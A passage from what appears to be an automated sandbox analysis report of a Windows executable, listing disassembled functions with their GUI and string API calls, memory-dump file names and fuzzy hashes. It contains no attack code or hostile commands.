                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 960795272-0
                                                                                                                                                                                                                                                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                                                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                                                                                                                            Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4189319755-0
                                                                                                                                                                                                                                                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                                                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                                                                                                                            Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1976402638-0
                                                                                                                                                                                                                                                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                                                                                                                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                                                                                                                                            Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                                                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                                                                                                            Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1871949834-0
                                                                                                                                                                                                                                                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                                                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                                                                                                                            Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                                                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                                                                                                            Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3611059338-0
                                                                                                                                                                                                                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                                                                                                                                            Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1640429340-0
                                                                                                                                                                                                                                                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                                                                                                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                                                                                                                                            Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3632110297-0
                                                                                                                                                                                                                                                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                                                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                                                                                                                                            Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 752480666-0
                                                                                                                                                                                                                                                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                                                                                                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                                                                                                                                            Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
